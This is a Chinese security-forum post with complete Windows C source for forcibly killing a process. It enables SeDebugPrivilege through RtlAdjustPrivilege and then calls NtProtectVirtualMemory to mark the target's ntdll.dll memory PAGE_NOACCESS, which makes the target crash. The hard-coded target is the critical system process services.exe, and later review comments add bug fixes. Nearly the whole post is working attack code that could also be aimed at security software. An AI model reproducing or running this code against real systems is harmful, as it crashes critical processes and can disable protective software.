利用NtProtectVirtualMemory结束进程

标 题 : 【原创】利用NtProtectVirtualMemory结束进程
作 者 : KiDebug
时 间 : 2011 - 07 - 13, 09 : 37 : 08
链 接 : http://bbs.pediy.com/showthread.php?t=137067
 
原理很简单:用PROCESS_VM_OPERATION打开目标进程(没必要PROCESS_ALL_ACCESS),再调用NtProtectVirtualMemory把目标进程中ntdll.dll映像所在的整段内存设为PAGE_NOACCESS,目标进程下一次进入ntdll时就会访问违例而崩溃。注意两点:代码用的是本进程中ntdll的基址和大小(GetModuleInformation),隐含假设目标进程中ntdll映射在同一地址、且两者位数一致;打开services.exe这类系统进程需要先启用SeDebugPrivilege,对应代码中的RtlAdjustPrivilege(20)。
/*
* 【作者:KiDebug】
* 【空间:http://hi.baidu.com/KiDebug/】
*  VC 6.0编译出错请百度:“vc 6.0 unicode”
*/
#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>
#include <Tlhelp32.h>
 
#pragma comment(lib,"Psapi.lib")
 
/*
 * Undocumented ntdll export, resolved at runtime with GetProcAddress
 * (see main). Enables/disables a single privilege on the process (or
 * current thread) token by numeric privilege value; `Enabled` receives
 * the previous state. The value 20 used below is expected to be
 * SE_DEBUG_PRIVILEGE from winnt.h — confirm against the SDK headers.
 */
typedef NTSTATUS(__stdcall *RtlAdjustPrivilege_)(
ULONG Privilege,
BOOLEAN Enable,
BOOLEAN CurrentThread,
PBOOLEAN Enabled
);
RtlAdjustPrivilege_ RtlAdjustPrivilege = NULL;
 
/*
 * Native equivalent of VirtualProtectEx, resolved at runtime from ntdll.
 * BaseAddress and RegionSize are in/out: the call rounds them to page
 * boundaries and writes the adjusted values back, so callers must pass
 * writable locals of exactly these types (PVOID and SIZE_T — a DWORD
 * SizeOfImage field is NOT a valid target on 64-bit builds).
 */
typedef NTSTATUS(__stdcall *NtProtectVirtualMemory_)(
    __in HANDLE ProcessHandle,
    __inout PVOID *BaseAddress,
    __inout PSIZE_T RegionSize,
    __in ULONG NewProtectWin32,
    __out PULONG OldProtect
    );
NtProtectVirtualMemory_ NtProtectVirtualMemory = NULL;
 
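/*
 * Find the PID of the first process whose image name equals `proc`
 * (case-insensitive) in a Toolhelp snapshot of all processes.
 *
 * proc: image file name to look for, e.g. L"services.exe".
 * Returns the PID, or 0 when `proc` is NULL, no process matches, or the
 * snapshot could not be taken. Callers must treat 0 as "not found" and not
 * hand it to OpenProcess.
 *
 * Fixes relative to the original:
 *  - CreateToolhelp32Snapshot reports failure with INVALID_HANDLE_VALUE, not
 *    NULL; `if (hSnapshot)` accepted the failure value and then CloseHandle
 *    was called on it. Only a valid snapshot is now used and closed.
 *  - The wide (W) Toolhelp entry points are called explicitly so the
 *    _wcsicmp on szExeFile no longer depends on UNICODE being defined.
 */
ULONG GetPID(WCHAR* proc)
{
    if (proc == NULL)
    {
        return 0;
    }

    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE)
    {
        return 0;
    }

    ULONG targetPid = 0;
    PROCESSENTRY32W entry = { 0 };
    entry.dwSize = sizeof(entry);   /* required by Process32FirstW */

    if (Process32FirstW(snapshot, &entry))
    {
        do
        {
            if (_wcsicmp(entry.szExeFile, proc) == 0)
            {
                targetPid = entry.th32ProcessID;
                break;
            }
        } while (Process32NextW(snapshot, &entry));
    }

    CloseHandle(snapshot);
    return targetPid;
}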
 
 
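/*
 * Entry point: make the target process's ntdll.dll image inaccessible so
 * that its next call into ntdll faults and the process is torn down.
 *
 * The base address and size of ntdll are read from THIS process
 * (GetModuleInformation on the current-process pseudo-handle) and applied to
 * the target. That is only meaningful if ntdll is mapped at the same address
 * in both processes — NOTE(review): this relies on Windows keeping one ntdll
 * base per boot for processes of the same bitness; a 32-bit build aimed at a
 * 64-bit target (or vice versa) would protect the wrong range. The hard-coded
 * target services.exe is a system process; expect the machine to become
 * unstable once it dies.
 *
 * Returns 0 on success, 1 on any failure (each failure is reported on stderr).
 *
 * Fixes relative to the original:
 *  - &ModuleInfo.SizeOfImage (a DWORD) was passed as PSIZE_T. On x64 the
 *    in/out write through it is 8 bytes and clobbers the neighbouring
 *    MODULEINFO field; properly typed locals are used instead.
 *  - `void main()` -> `int main(void)`; GetModuleHandle, RtlAdjustPrivilege,
 *    GetPID and NtProtectVirtualMemory results are checked; the process
 *    handle is closed.
 */
int main(void)
{
    HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
    if (ntdll == NULL)
    {
        fprintf(stderr, "GetModuleHandle(ntdll.dll) failed: %lu\n", GetLastError());
        return 1;
    }

    MODULEINFO ModuleInfo = { 0 };
    if (!GetModuleInformation(GetCurrentProcess(), ntdll, &ModuleInfo, sizeof(ModuleInfo)))
    {
        fprintf(stderr, "GetModuleInformation failed: %lu\n", GetLastError());
        return 1;
    }

    RtlAdjustPrivilege = (RtlAdjustPrivilege_)GetProcAddress(ntdll, "RtlAdjustPrivilege");
    NtProtectVirtualMemory = (NtProtectVirtualMemory_)GetProcAddress(ntdll, "NtProtectVirtualMemory");
    if (RtlAdjustPrivilege == NULL || NtProtectVirtualMemory == NULL)
    {
        fprintf(stderr, "required ntdll exports not found\n");
        return 1;
    }

    /*
     * SeDebugPrivilege is needed to open a system process such as
     * services.exe. A failure here is reported but not fatal: if the
     * privilege really is missing, OpenProcess below fails with a clear
     * error of its own.
     */
    BOOLEAN wasEnabled = FALSE;
    NTSTATUS status = RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &wasEnabled);
    if (status < 0)   /* NTSTATUS failure codes are negative */
    {
        fprintf(stderr, "warning: RtlAdjustPrivilege(SeDebugPrivilege) failed: 0x%08lX\n",
                (unsigned long)status);
    }

    ULONG pid = GetPID(L"services.exe");
    if (pid == 0)
    {
        fprintf(stderr, "target process not found\n");
        return 1;
    }

    /* PROCESS_VM_OPERATION is all NtProtectVirtualMemory needs. */
    HANDLE hProc = OpenProcess(PROCESS_VM_OPERATION, FALSE, pid);
    if (hProc == NULL)
    {
        fprintf(stderr, "OpenProcess(%lu) failed: %lu\n", pid, GetLastError());
        return 1;
    }

    /*
     * BaseAddress/RegionSize are in/out and get rounded to page boundaries,
     * so pass dedicated locals of the exact native types.
     */
    PVOID  base = ModuleInfo.lpBaseOfDll;
    SIZE_T size = ModuleInfo.SizeOfImage;
    ULONG  oldProtect = 0;
    status = NtProtectVirtualMemory(hProc, &base, &size, PAGE_NOACCESS, &oldProtect);
    CloseHandle(hProc);

    if (status < 0)
    {
        fprintf(stderr, "NtProtectVirtualMemory failed: 0x%08lX\n", (unsigned long)status);
        return 1;
    }

    return 0;
}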

 
